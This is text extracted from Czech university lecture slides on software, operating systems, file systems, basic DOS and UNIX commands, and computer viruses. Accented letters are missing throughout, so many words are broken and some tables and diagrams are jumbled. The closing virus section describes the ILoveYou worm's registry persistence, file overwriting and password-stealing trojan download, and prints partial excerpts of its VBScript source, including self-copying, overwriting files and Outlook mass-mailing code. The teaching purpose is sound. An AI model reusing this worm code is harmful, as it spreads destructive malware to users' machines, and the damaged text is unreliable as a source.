Prezentace - Zdeněk Jelínek

Prezentace - Zdeněk Jelínek

stav automatizace inenrskch loh a informatiky FAST VUT v Brn Zklady informatiky a vpoetn techniky 1 PROGRAMOV VYBAVEN, OPERAN SYSTMY 1999 2002, Michal Vojkvka 1 Programov vybaven (software) 2 zkladn programov vybaven (operan systmy) prostedky pro tvorbu aplikanho programovho vybaven (vvojov prosted, ...) aplikan programov vybaven (kancelsk aplikace,

CAD, hry, ...) Nejznmj programovac jazyky Pascal, C, C++, Java, VisualBasic, Fortran, ... Konkrtn ilustran pklady uvdn v dalm textu jsou zameny zejmna na operan systm MS Windows 2000. Hodnocen programovho vybaven funknost a variabilita propustnost objem dat a mnostv operac, kter je schopen program zpracovat za jednotku asu; zce souvis s parametry technickho vybaven spolehlivost jak pln poadovan funkce, odolnost vi chybm uivatele i technickho vybaven doba odezvy souvis t s technickm vybavenm nronost z hlediska obsluhy zejmna uivatelsk pvtivost (user friendly software) rove dokumentace rozsah, pehlednost, nzornost, ... adaptabilita schopnost reagovat na zmny ve funknosti portabilita penositelnost programu na pota jinho

typu nebo vrobce cena tvo stle vy podl na cen celho vpoetnho systmu 3 ivotn cyklus programovho dla specifikace problmu zadn problmu, nvrh komunikace s programem analza vytvoen logickho modelu eenho systmu nvrh rozklad na dl problmy, nvrh metody een implementace nvrh reprezentace dat, nvrh algoritm, zpis v programovacm jazyce, ladn tvorba dokumentace s clem umonit snadn pouvn jinm uivatelm testovn oven sprvn funkce programu provoz a drba odstrann zjitnch nedostatk

a pizpsoben programu dodatenm poadavkm 4 Co uvdj statistiky? 31 % vech softwarovch projekt je zastaveno, ani by byly dokoneny dle zadn vce ne 70 % zbvajcch je dodno, ani by splnily oekvn zadavatel prmrn projekt je dokonen za 189 % plnovanch nklad a 222 % plnovanho asu jen 9 % velkch projekt bylo dokoneno vas a za plnovanou cenu jen 16 % projekt v malch firmch bylo dokoneno vas a za plnovanou cenu Pota udl to, co naprogramuje, ne to, co chce. 5

Operan systm (OS) soubor program, kter d innost technickho vybaven potae a umouj a usnaduj innost aplikac hlavnm kolem OS je zprostedkovat vazbu mezi technickm vybavenm potae a aplikacemi OS poskytuje aplikacm sluby a aplikace volnm tchto slueb ovldaj technick vybaven potae aplikace by nemly mt pm pstup k technickmu vybaven potae Aplikace Operan systm Technick vybaven 6 Layers of a Computer System 7

Funkce operanho systmu d a spravuje technick prostedky pidluje as procesoru, pam, vstupn a vstupn zazen, ... spravuje data d jejich vstup a vstup, pstup k nim, uchovn , ... d zpracovn loh jejich ppravu, plnovn a prbh tak, aby byla zajitna maximln efektivita jejich zpracovn podporuje komunikaci uivatele s potaem formou uivatelskho rozhran, informuje t uivatele o vzniklch problmech i chybch podporuje bezpenost a spolehlivost vpoetnho systmu formou rznch rovn pstupovch prv apod. 8 Operan systmy dleit pojmy

driver (ovlada) tvo rozhran mezi rznorodmi periferiemi a jednotnou komunikaci mezi nimi; ovlada je zvisl na typu periferie; do operanho systmu se zaleuje instalac bootovn zavdn operanho systmu do operan pamti potae multitasking monost provdn vce loh souasn kooperativn (nonpreemtivn) pidluje procesm as procesoru na takovou dobu, jakou proces poaduje preemtivn pidlovn asu procesoru d OS, po urit dob je zen pedno jinmu procesu; oproti kooperativnmu multitaskingu je mn zraniteln (havrie jednoho procesu obvykle neznamen havrii celho systmu) 9 10

Operating Systems Important Terms kernel portion of operating system that is in main memory; contains most-frequently used functions; also called the nucleus process a program in execution; an instance of a program running on a computer; the entity that can be assigned to and executed on a processor; consists of of three components: an executable program associated data needed by the program execution context of the program Characteristics of Modern OS Microkernel architecture assigns only a few essential functions to the kernel address space interprocess communication (IPC) basic scheduling

Multithreading process is divided into threads that can run simultaneously Thread dispatchable unit of work; executes sequentially and is interruptable process is a collection of one or more threads 11 Rozdlen operanch systm 12 jednouivatelsk jednolohov (single-user single-task) nap. CP/M, MS-DOS; s podporou OS b pouze jedna aplikace jednouivatelsk vcelohov (single-user multi-task) nap. Windows 95, Windows 98; jeden uivatel me mt souasn sputno vce aplikac vceuivatelsk vcelohov (multi-user multi-task)

nap. UNIX, Linux; umouj zpracovvat poadavky vce uivatel souasn systmy s relnm asem (real time) zejmna pro zen technologickch proces Komunikace uivatele s OS zpsob, jakm uivatel dv pokyny pro OS a v jak form dostv zprvy o vsledku proveden operace, je oznaovn jako uivatelsk rozhran (User Interface) existuj v podstat dv formy uivatelskho rozhran: textov uivatelsk rozhran nap. MS-DOS, uivatel zadv pokyny prostednictvm tzv. pkazovho dku grafick uivatelsk rozhran (Graphical User Interface, GUI) pevn vtina souasnch operanch systm, obvykle t monost zapisovat pkazy v pkazovm dku

13 Komunikace uivatele s OS Textov uivatelsk rozhran Grafick uivatelsk rozhran 14 Organizace dat na disku 15 Diskov jednotky potae oznaovny psmeny A a Z A:, B: - disketov jednotky

C: - systmov st pevnho disku D:, E:, ... - dal (logick) pevn disky - vnj pamti (CD-ROM, ZIP, ...) - namapovan sov disky Pklad: A: C: D: E: Q: disketov jednotka

systmov st pevnho disku 10 GB logick pevn disk 10 GB jednotka CD-ROM sov disk Data na discch C: a D: mohou bt ve skutenosti uloena na jedinm pevnm disku s kapacitou 20 GB (podle konfigurace potae). 16 Organizace dat na disku Logick rozdlen disku pklad Primrn oblast 4 GB C: 4 GB

Fyzick disk 10 GB D: Rozen oblast 3 GB 6 GB E: 3 GB Pevn disk Oblasti

(partitions) Logick disky Organizace dat na disku - soubory Soubor (File) mnoina logicky souvisejcch prvk pojmenovan posloupnost bajt uloen na zznamovm mdiu nzev souboru se skld ze jmna a ppony (nap. faktura.doc, calc.exe apod.) ppona je nepovinn (ale tm vdy se pouv) a je od jmna oddlena tekou ppona obvykle uruje typ (formt) souboru pravidla pro pojmenovn soubor zvis na konkrtnm operanm systmu v nzvu souboru nejsou obvykle povoleny znaky \ / : * ? < > |

17 Organizace dat na disku - soubory 18 v operanm systmu MS-DOS mohlo mt jmno souboru dlku max. 8 znak a ppona max. 3 znaky operan systm UNIX rozliuje velk a mal psmena v nzvech soubor Nejednoznan specifikace soubor pouv se tzv. hvzdikov konvence (wildcards) jmno a ppona souboru se nemus uvdt jednoznan, lze pout zstupnch znak * a ? * zastupuje libovoln poet (i dn) znak ? zastupuje vdy jeden libovoln znak pouit je mon tm ve vech pkazech, kde se

vyskytuje jmno souboru Organizace dat na disku - soubory 19 Nejednoznan specifikace souboru Pklad: Pedpokldejme soubory (v jedn sloce) dop.exe dopis.rtf dopis.txt dopis2.doc dopis3.txt doporuc.txt Nsledujc zpisy potom specifikuj tyto soubory: dopis*.* dopis.rtf dopis.txt dopis2.doc dopis3.txt dop*.* vechny soubory, protoe vechny zanaj na dop

dop.* dop.exe dopis?.* dopis2.doc dopis3.txt dopis.?? dn soubor (ppona by musela mt dlku 2 znaky) dop.?x? dop.exe dop*.?x? dop.exe dopis.txt dopis3.txt doporuc.txt

*.* vechny soubory *.txt dopis.txt dopis3.txt doporuc.txt (vechny soubory s pponou txt) Organizace dat na disku - soubory 20 Organizace dat na disku - soubory Ppony soubor (File Extensions) Spustiteln soubory, skripty exe (executable file) com (command file)

bat (batch file) dvkov soubor vbs (Visual Basic Script file) js (JScript, JavaScript file) Textov dokumenty txt (text file) doc (MS Word Document, pp. jin fomt) rtf (Rich Text Format) ps (PostScript) pdf (Portable Document Format) 602 (Text602) 21 Organizace dat na disku - soubory 22 Ppony soubor Hypertextov dokumenty

htm, html (HyperText Markup Language) Grafick soubory (obrzky) jpg, jpe, jpeg (Joint Photographic Experts Group) gif (Graphical Interchange Format) png (Portable Network Graphics) bmp (Bitmap file) pcx (PC Paintbrush format) tif, tiff (Tag Image File Format) Organizace dat na disku - soubory 23 Ppony soubor Zvukov soubory mp3, mpeg3 (MPEG Audio Layer 3) wav (Waveform sound) ra (Real Audio) mid (Musical Instrument Digital Interface MIDI)

Multimediln formty (audio/video) mpg, mpeg (Moving Picture Experts Group) avi (Audio Video Interleaved) asf (Advanced Streaming Format) qt (QuickTime) mov (Movie) Organizace dat na disku - soubory Ppony soubor Archivn soubory (komprimovan) viz dle zip rar arj

gz, gzip (zejmna v OS UNIX) pp. exe (self-extracting archive samorozbalujc) Dal formty xls (MS Excel Spreadsheet) ppt (MS PowerPoint Presentation) ttf (True Type Font) dwg (Autocad Drawing) dll (Dynamic Link Library dynamick knihovna) bak (backup file zlon soubor) tmp (temporary file doasn soubor)

24 Organizace dat na disku - soubory 25 Asociace vyuit ppony souboru k vyvoln akce, kter je s touto pponou spojena (nap. soubor s pponou XLS sputn aplikace MS Excel a automatick naten toho souboru) dan aplikace vak mus poadovan formt souboru podporovat Organizace dat na disku - adrese

26 Adres (directory) / sloka (folder) adres (nebo podadres) je prostor na disku, kter me obsahovat soubory nebo dal (pod)adrese adrese tvo hierarchickou stromovou strukturu adres je uren svm jmnem podle stejnch pravidel jako nzev souboru (ppona se vak obvykle nepouv) na disku je vdy adres, kter se nazv hlavn (koenov, root) a je oznaen znakem \ v rznch adresch mohou existovat podadrese nebo soubory se stejnm nzvem od operanho systmu Windows 95 je pojem adres nahrazen pojmem sloka Organizace dat na disku - cesty

27 konkrtn soubor je jednoznan uren oznaenm disku, posloupnost adres vedoucch do adrese, kde je soubor uloen (tzv. cesta), a vlastnm nzvem souboru Cesta (path) uruje pesn umstn souboru ve stromov struktue adres je dna jmny jednotlivch do sebe zanoench adres oddlench oddlovacm znakem jako oddlovac znak se obvykle pouv \ nebo / cestu lze zapsat jako absolutn (plnou) zan vdy koenovm adresem, pp. i oznaenm disku relativn (neplnou) zan aktulnm adresem Organizace dat na disku - cesty

Absolutn cesta Aktuln adres C:\Dokumenty C:\Dokumenty\recenze.doc C:\Dokumenty\Pracovn\adresy.doc C:\Dokumenty\Zloha\photo.jpg 28 Organizace dat na disku - cesty Relativn cesta 29 Konvence

. aktuln adres .. rodiovsk (nadazen) adres Aktuln adres C:\Dokumenty recenze.doc (nebo .\recenze.doc) Osobn\doporuc.txt Aktuln adres C:\Dokumenty\Pracovn adresy.doc (nebo .\adresy.doc)

..\kola.txt ..\Osobn\dopis.rtf Organizace dat na disku - komprese Komprese soubor (file compression) speciln metoda vedouc ke zmenen velikosti souboru (soubor) beze ztrty informace (ve specilnch ppadech me ke ztrt dojt) programy pro kompresi soubor umouj vytvoit z vybranch soubor a adres jedin soubor, jeho objem je men ne souet velikost jednotlivch soubor v balku (archivu) mezi nejznmj formty pouvan pro kompresi soubor pat ZIP, RAR, ARJ, ... provst kompresi se obvykle k zazipovat nebo zabalit; msto pojmu dekomprimovat se asto pov rozbalit komprese a dekomprese dat me bt t provdna

on-line (nap. s podporou operanho systmu) 30 Organizace dat na disku - komprese 31 5 018 / 39 936 = 0,13 1 0,13 = 0,87 spora 87 % 160 KB 37,5 KB Organizace dat na disku - komprese Kompresn pomr vdy zle na konkrtnm typu souboru.

4,02 MB 3,65 MB 32 Organizace dat na disku cluster (klastr, alokan jednotka) nejmen logick datov jednotka na disku, skupina nkolika sektor poet sektor v clusteru souvis s kapacitou disku, m vt je disk, tm vt bv i velikost clusteru i kdy ulome na disk soubor o velikosti jen 1 B, obsadme tm ve skutenosti cel cluster, protoe cluster je nejmen logick datov jednotka na disku Master Boot Record (MBR) uloen v nultm sektoru nult stopy disku, m dv sti: tabulku oblast (partition table) zavdc zznam krtk program spoutn BIOSem pi startu potae, jeho kolem je nast

tabulku oblast a najt aktivn oblast (tu, z n se nate systm) 33 Organizace dat na disku 34 virtuln pam slou ke zvten kapacity operan pamti. Pokud systm potebuje vce pamti ne je dostupn fyzick pam RAM, jsou do souboru virtuln pamti na pevnm disku odkldny prv nepouvan pamov bloky. Jde pochopiteln o jakousi nouzovou pam, protoe pstup k pevnmu disku je mnohem pomalej ne k pamti RAM. defragmentace neustl prce se soubory na pevnm disku (ukldn, mazn) m za nsledek, e

uloen soubory jsou rozkouskovny na nkolik st. Defragmentace roztrouen kousky soubor uspod tak, aby obsah jednotlivch soubor byl uloen co nejvce pohromad (nap. v po sob jdoucch clusterech), m se urychl prce s tmito soubory. Virtual Memory 35 using a disk as an extension of RAM so that the effective size of usable memory grows correspondingly is managed by an operating system the OS will write the contents of a currently unused block of the main memory to the hard disk so that the memory can be used for another purpose when the original contents are needed again, they are read back into memory this is all made completely transparent to the user

of course, reading and writing the hard disk is slower than using RAM, so the programs don't run as fast Virtual Memory contd 36 the part of the hard disk that is used as virtual memory is called the swap space the cache concept is intended to bridge the speed gap between the CPU and the main memory the virtual-memory concept bridges the size gap between the main memory and the socondary storage Defragmentation each file is stored as a linked list of clusters fragmentation: a result of the creation and deletion of files over a period of time defragmentation reduces data access time and

allows storage to be used more efficiently 37 38 Defragmentation example let's consider a disk that contains only 12 clusters initially, all clusters are empty 1 2 3 4 5

6 7 8 9 10 11 12 create four files: file A takes up 1 cluster, B takes 4, C takes 2, D takes 3 A B

B B B B B C C D D D

D D D D D D D D D

delete the file C A B B create new file E that needs 3 clusters A B B B B E

E E delete files A and E B B B B create file F which takes up 4 clusters F B

B B B F F D D D F F

F F D D D after defragmentation B B B B

F Typy souborovch systm FAT (File Allocation Table) tabulka umstn soubor 12-bitov FAT (FAT12) pouze na disketch 16-bitov FAT (FAT16) 32-bitov FAT (FAT32) NTFS (New Technology File System) umouje definovat pstupov prva pro jednotliv soubory a adrese 39 Typy souborovch systm FAT (File Allocation Table) tabulka umstn soubor Velikost oblasti FAT32

Velikost clusteru < 260 MB 512 B *) 260 MB 8 GB 4 KB 8 GB 16 GB 8 KB 16 GB 32 GB 16 KB 32 GB 2 TB

32 KB *) omezen pouit 40 FAT12, FAT16, FAT32 srovnn 41 FAT12: The oldest type of FAT uses a 12-bit binary number to hold the cluster number. A volume formatted using FAT12 can hold a maximum of 4086 clusters, which is 212 minus a few values (to allow for reserved values to be used in the FAT). FAT12 is therefore most suitable for smaller volumes, and is used on floppy disks and hard disk partitions smaller than about 16 MB. FAT16: The FAT used for most hard disk partitions uses a 16-bit binary number to hold cluster numbers. When you see someone refer to a "FAT" volume generically, they are usually referring to FAT16, because it is the de

facto standard for hard disks. A volume using FAT16 can hold a maximum of 65526 clusters, which is 216 less a few values (again for reserved values in the FAT). FAT16 is used for hard disk volumes ranging in size from 16 MB to 2048 MB. FAT32: The newest FAT type, FAT32 is supported by Windows 95's OEM SR2 release, as well as Windows 98. FAT32 uses a 28-bit binary cluster number not 32, because 4 of the 32 bits are "reserved". 28 bits is still enough to permit ridiculously huge volumes FAT32 can theoretically handle volumes with over 268 million clusters, and will support (theoretically) drives up to 2 TB in size. However to do this the size of the FAT grows very large. www.storagereview.com/guide2000/ref/hdd/file/partSizes.html FAT12, FAT16, FAT32 srovnn Attribute FAT12 FAT16

FAT32 Used for Floppies and small hard disk volumes Small to large hard disk volumes Medium to very large hard disk volumes Size of Each FAT Entry

12 bits 16 bits 28 bits Maximum Number of Clusters 4 086 65 526 ~ 268 435 456 Cluster Size Used 0.5 KB to 4 KB

2 KB to 32 KB 4 KB to 32 KB Maximum Volume Size 16 736 256 ~ 16 MB 2 147 123 200 ~ 2.1 GB about 241 ~ 2 TB 42

Podpora souborovch systm Operan systm Podporovan souborov systmy MS-DOS FAT16 MS Windows 95*, 98, Me FAT16, FAT32 MS Windows NT FAT16, NTFS

MS Windows 2000, XP FAT16, FAT32, NTFS 43 Zjitn typu souborovho systmu 44 Zavdn operanho systmu testovac a diagnostick programy (s vyuitm slueb BIOSu) zavad nalezne systmov disk nate do RAM zavdc zznam zavdc zznam zahj natn dalch systmovch soubor (jdra) This procedure may differ slightly for various computers and operating systems.

45 Nejznmj operan systmy MS-DOS (MicroSoft Disk Operating System) Windows 95, Windows 98, Windows Me (Millennium Edition) Windows NT (New Technology), Windows 2000, Microsoft Windows XP (Experience) OS/2 (IBM) LINUX, UNIX, 46 Dv vvojov vtve MS Windows

47 Dal operan systmy Linux 48 Operan systm MS-DOS 49 dve velice populrn diskov jednouivatelsk jednolohov operan systm pouvan na osobnch potach 50 Operan systm MS-DOS

Zkladn pkazy sputn programu: zmna aktulnho disku: zmna aktulnho adrese do pmo podzenho: do libovolnho: do nadzenho: obsah aktulnho adrese pln vpis: zhutn vpis: s pozastavenm vpisu: vytvoen adrese: zruen adrese: smazn souboru: pejmenovn souboru: vpis obsahu souboru: pesun souboru: koprovn souboru:

soubor disk: npovda: pkaz /? nebo cesta\soubor cd adres cd cesta\adres cd .. dir dir /w dir /p (dir | more) md jmno rd jmno del soubor ren stary novy type soubor

move co kam copy co kam vytvoen systmovho disku: sys disk: rozdlen disku: fdisk formtovn disku: format disk: 51 Operan systm UNIX pro kad soubor a adres se definuj pstupov prva pro vlastnka skupinu vlastnka (U) ostatn

(O) (G) mon prva jsou R (read) ten souboru, prohlen obsahu adrese W (write) zmna a vmaz souboru, vytvoen a smazn adrese X (execute) monost sputn souboru, monost vstupu do adrese

drwxrwxrwx -rw-r----- drwxr-xr-x 52 Operan systm UNIX Zkladn pkazy sputn programu: zmna aktulnho adrese do pmo podzenho: do libovolnho: do nadzenho: obsah aktulnho adrese pln vpis: zhutn vpis:

s pozastavenm vpisu: vytvoen adrese: zruen adrese: smazn souboru: pejmenovn souboru: vpis obsahu souboru: pesun souboru: koprovn souboru: npovda: cesta/soubor cd adres cd cesta/adres cd .. ls l (ll) ls f (lsf)

ll | more mkdir jmno rmdir jmno rm soubor mv stary novy cat soubor mv co kam cp co kam man pkaz General UNIX Architecture 53 Windows NT Windows NT Workstation OS pro sov stanice Windows NT Server vkonn server pro s typu Klient-Server Nkter vlastnosti systmu:

vt nezvislost na platform (vyuit tzv. HAL) preemptivn multitasking ovovn uivatele pi pstupu do systmu NTFS ochrana dat na serveru a pracovn stanici podpora vech bnch protokol pro komunikaci v LAN a WAN nov grafick nstroje pro sprvu systmu domnov koncepce Domna = logick skupina pota se spolenou databz uivatel a zabezpeovacch informac vy spolehlivost systmu 54 55 Nastaven konfigurace ovldac panely registr - aplikace regedit nebo regedt32 HKEY_CURRENT_USER - konfigurace aktuln pihlenho

uivatele HKEY_USERS profily vech uivatel definovanch na danm potai HKEY_LOCAL_MACHINE konfigurace potae (pro vechny uivatele) HKEY_CLASSES_ROOT soust HKEY_LOCAL_MACHINE HKEY_CURRENT_CONFIG daje o prv pouvanm HW profilu Uivatelsk ty Skupiny: lokln globln Nkter standardn skupiny: Everyone Administrators System Windows 2000

56 Nov programy dodvan s Windows 2000 Editor font Narrator - pope hlasem to, na co uke uivatel my Fax Telefon (pes Internet, monost videokonference) Nov monosti pi odinstalovn softwaru je mono zjistit, jak asto je dan program spoutn, kolik zabr msta, spoutn aplikac jako jin uivatel stav hibernace Windows 2000 57 Stav hibernace

zabere na HDD tolik msta, jak velk je operan pam sputn potae ze stavu hibernace trv jen asi 10 s a automaticky se spust i aplikace, kter byly sputny pi pechodu do reimu hibernace mus se aktivovat: OBRAZOVKA VLASTNOSTI SPOI OBRAZOVKY NAPJEN REIM SPNKU ZAPNOUT PODPORU REIMU SPNKU reim hibernace mus podporovat i zkladn deska Windows 2000 exploits the power of todays 32-bit microprocessors modular structure for flexibility executes on a variety of hardware platforms modified microkernel architecture not a pure microkernel many system functions outside of the microkernel run in kernel mode

any module can be removed, upgraded, or replaced without rewriting the entire system 58 Windows 2000 Layered Structure Hardware Abstraction Layer (HAL) isolates the operating system from platformspecific hardware differences Microkernel most-used and most fundamental components of the operating system Device drivers translate user I/O function calls into specific hardware device I/O requests 59 W2K Executive I/O manager

Object manager Security reference monitor Process/thread manager Local procedure call (LPC) Facility Virtual memory manager Cache manager Windows/graphics modules 60 Windows 2000 User Processes Special system support processes Ex: logon process and the session manager Server processes Environment subsystems User applications 61

Windows 2000 Client/Server Model Simplifies the Executive - possible to construct a variety of APIs Improves reliability - each service runs as a separate process with its own partition of memory - clients cannot not directly access hardware Provides a uniform means fro applications to communicate via LPC Provides base for distributed computing 62 Windows 2000 Threads and SMP SMP Symmetric Multiprocessing Different routines can execute simultaneously on different processors Multiple threads of execution within a single process may execute on different processors

simultaneously Server processes may use multiple threads Share data and resources between process 63 Windows 2000 Architecture 64 Sdlen prostedk 65 disk, adres, soubor, jin zazen - lze nabdnout ke sdlen monost nastaven pstupovch prv ke sdlenmu prosted Souborov systm NTFS

66 dlouh jmna, vlastnk, pstupov prva pro soubory a adrese jsou k dispozici pstupov prva: R Read zobrazen soubor a adres, ten soubor W Write monost zpisu a zmny obsahu soubor a adres X eXecute lze spustit soubor nebo adres se me stt aktulnm D Delete ruen soubor a adres P Change Permissions monost zmnit oprvnn pro soubor (adres) O Take Ownership monost pevzt vlastnictv souboru (adrese) Nkter standardn oprvnn:

Read Change Full Control No Access (RX) (RX) (RWXD) (RWXD) All All Windows Me 67 Windows Millenium Edition Deset hlavnch dvod pro inovaci na OS Windows Me importovn a prava domcch videofilm pesun sbrky fotografi z krabice od bot na pevn disk vytvoen archivu a rejstku oblben hudby ochrana dleitch soubor

obnoven pvodnch nastaven potae nalezen odpovd na hledan otzky pouit potae k programovn videa i termostatu propojen pota v domcnosti efektivnj komunikace s pteli a spolupracovnky hran her na nov rovni http://www.microsoft.com/cze/windows/windowsME/upgrade/upgradewhy.asp Windows XP Windows XP Professional vhodn pro firmy a nron uivatele; postaven na zklad jdra pouitho v systmech Windows 2000 a Windows NT Workstation NT Kernel; vysok rove vkonu, bezpenosti a stability Windows XP Home Edition zejmna pro domc pouit 68

Windows CE Windows pro penosn zazen typu Handheld PC nebo Palm PC zcela odlin verze Windows, kter nen kompatibiln s X86 based Windows zanaj uplatovat jako AutoPC tj. pota do auta 69 Literatura www.zive.cz williamstallings.com 70 Kontroln otzky 71

Uvete nejznmj programovac jazyky. Definujte pojmy adaptabilita, portabilita a kompatibilita (programovho vybaven). Co to je operan systm? Pro by aplikace nemly mt pm pstup k technickm prostedkm? Uvete zkladn funkce operanho systmu. Vysvtlete pojmy driver, bootovn. Co to je multitasking? Jak je rozdl mezi kooperativnm a preemptivnm multitaskingem? Uvete nejznmj vceuivatelsk operan systmy. Vysvtlete pojem uivatelsk rozhran operanho systmu. Kontroln otzky Uvete nejznmj operan systmy pouvan na osobnch potach. Co to je soubor (file)? Z eho se skld nzev souboru? Jak znaky nejsou obvykle povoleny v nzvu souboru?

Jak zstupn znaky se pouvaj pi nejednoznan specifikaci soubor? Jak maj tyto znaky vznam? Uvete nejastji pouvan ppony spustitelnch soubor, textovch dokument, grafickch, zvukovch a multimedilnch soubor. Co to je asociace? Co to je adres (directory) / sloka (folder)? K emu slou cesta (path)? Uvete rozdl mezi absolutn a relativn cestou. 72 Kontroln otzky Pro se soubory komprimuj? V jakch ppadech lze pout ztrtovou metodu komprese? Uvete nejznmj formty pouvan pro kompresi soubor. Co to je cluster? K emu slou a co obsahuje Master Boot Record?

Vysvtlete pojmy FAT a NTFS. Jak je mezi nimi zkladn rozdl? Kter operan systmy podporuj souborov systm NTFS? Popite zavdn operanho systmu. K emu slou virtuln pam? Co to je defragmentace soubor? 73 stav automatizace inenrskch loh a informatiky FAST VUT v Brn Zklady informatiky a vpoetn techniky 1 Potaov viry 1999 2002, Michal Vojkvka

74 Potaov viry 75 termn potaov virus byl poprv pouit v roce 1972 ve vdecko-fantastickm romnu Davida Herolda When Harley Was One (neodpovd dnenmu pojet) termn potaov virus byl poprv definovn Fredem Cohenem v roce 1983 prvn virus na potach tdy IBM PC s operanm systmem MS-DOS se objevil v lednu 1986 (pkistnsk virus Brain) potaov virus m dv zkladn funkce: vkld sm sebe do jinch program (tj. infikuje je) provd njakou (vtinou kodlivou) innost Typy infiltrac

trojsk kon (Trojan Horses) vtinou nedochz k samovolnmu rozmnoovn ervi (Worms) v prosted potaovch st zadn vrtka (Backdoors) vyuvaj hackei, nap. Troj/Qaz (srpen 2000) viry (Viruses) nejastj typ infiltrace, asto se pouv jako univerzln oznaen 76 Princip innosti potaovho viru mechanismus en viru mus zajistit infikovn dalch program a dalch pota mechanismus obrany viru zajiuje utajen ped uivatelem a ped antivirovmi programy mechanismus vlastn innosti viru provd jist (zpravidla kodliv) akce na infikovanm potai 77

Projevy potaovch vir 78 destrukce dat zobrazovn rznch zprv na obrazovce vyluzovn rznch zvuk a melodi (Yankee Doodle) vtipkovn s uivatelem (vkldn vtipnch koment do textovch soubor, rzn animace, ...) simulace selhn technickho vybaven zpomalovn innosti potae Vlastnosti potaovch vir 79 souasn potaov viry nemohou pokodit technick vybaven potae, mohou vak smazat obsah pamti

Flash-BIOS u nkterch zkladnch desek a tm znemonit chod potae viry CIH (ernobyl), Emperor a FlashKiller existuj mty o pokozovn FDD, HDD, monitor apod., vtinou vak jde o chybn navren zazen virus se neme zapsat na disketu ochrnnou proti zpisu formtovnm pevnho disku se virus nemus vdy odstranit, nebo kd viru me bt zapsn jet v Master Boot Recordu (MBR) Pojmenovn potaovch vir pmo autorem viru (AIDS, Brain, Alabama) podle msta svho odhalen (Durban, Suomi, Taiwan) podle innosti, kterou provd (Flip, Ping-Pong, Jo-Jo, Yankee Doodle) podle dlky, o n zvtuje infikovan soubory (405, 5120, 4096) podle data aktivace (Friday 13th, December 24th,

Advent) 80 Motivan impulsy tvrc vir legrace touha po slv prostedek seberealizace prost lidsk zvdavost snaha kodit, niit, ublit ekonomick zisk 81 Dlen vir podle napadench oblast boot viry (Boot Viruses) napadaj boot sektor, MBR a tm si zajist sv sputn hned pi startu potae souborov viry (File Viruses) jejich hostitelem jsou soubory, podle zpsobu infekce se dl souborov

viry na pepisujc, parazitick a doprovodn multipartitn viry (Multipartite Viruses) napadaj vce st (boot sektor i soubory) makroviry (Macroviruses) se v prosted aplikac podporujcch makra (MS Word, MS Excel) 82 Antivirov programy slou k detekci a odstrann potaovch vir a prevenci proti ppadn nkaze je teba provdt jejich pravidelnou aktualizaci nejznmjmi antivirovmi programy jsou AVG, AVAST, SCAN, Norton Antivirus, F-Prot, v dnen dob je znmy desetitisce rznch potaovch vir 83

Prevence proti potaovm virm pouvat legln programov vybaven pouvat antivirov programy zmnit bootovac sekvenci na C:, A: (v setupu) vypnout WSH (Windows Script Host) msto soubor DOC pouvat radji soubory RTF (pozor na pouhou zmnu ppony!) u neznmch dokument MS Office zakzat makra radji pouvat jen prohlee ne samotn aplikace nespoutt dn podezel programy (z Internetu) zlohovat dleit data 84 Potaov virus ILoveYou se prostednictvm elektronick poty (erv) zprva, kter doraz, m pedmt ILOVEYOU, tlo zprvy obsahuje text kindly check the attached LOVELETTER coming from me a plohou zprvy

je soubor LOVE-LETTER-FOR-YOU.TXT.VBS, kter obsahuje vlastn virus pro en potebuje program MS Outlook (zde bere e-mailov adresy dalch obt, na kter se automaticky rozele) a nainstalovanou podporu WSH (Windows Scripting Host), protoe je napsn v jazyce VBScript po sputn souboru LOVE-LETTER-FOR-YOU.TXT.VBS se virus usad v systmu 85 Potaov virus ILoveYou vytvo nov kle v registrech HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL tak, aby se virus aktivoval pi kadm sputn potae

ve sloce C:\WINDOWS\SYSTEM pak vytvo soubory MSKERNEL32.VBS a Win32DLL.VBS na pevnch i sovch discch vyhledv soubory s pponami VBS, VBE, JS, JSE, CSS, WSH, SCT, HTA, jejich obsah pepe svm tlem a pponu zmn na VBS v ppad soubor JPG a JPEG se pepe obsah a k pvodn ppon se dopln navc VBS obsah soubor MP2 a MP3 zstv ueten 86 Potaov virus ILoveYou 87 neexistuje-li soubor C:\WINDOWS\WINFAT32.EXE, nastav domovskou strnku Internet Exploreru tak, aby ze serveru http://www.skyinet.net stahoval

soubor WIN-BUGSFIX.EXE, kter obsahuje trojskho kon, jen se usad do souboru WINFAT32.EXE a sna se e-mailem odeslat urit data (hesla, ) se i prostednictvm mIRC tak, e se virus rozele astnkm kanl, na kterch nkdo z nakaenho prosted chatuje 4. kvtna 2000 nakazil tento virus bhem nkolika hodin miliny pota po celm svt a zaslouil si tm pozornost mdi Potaov virus ILoveYou 88 Ukzky zdrojovho kdu (jazyk VBScript) rem barok -loveletter(vbe) rem by: spyder / [email protected] / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow

eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if pokraovn 89

Potaov virus ILoveYou Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() end sub ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy ap.close elseif (ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ... dokonen Potaov virus ILoveYou st zajiujc en viru e-mailem sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI")

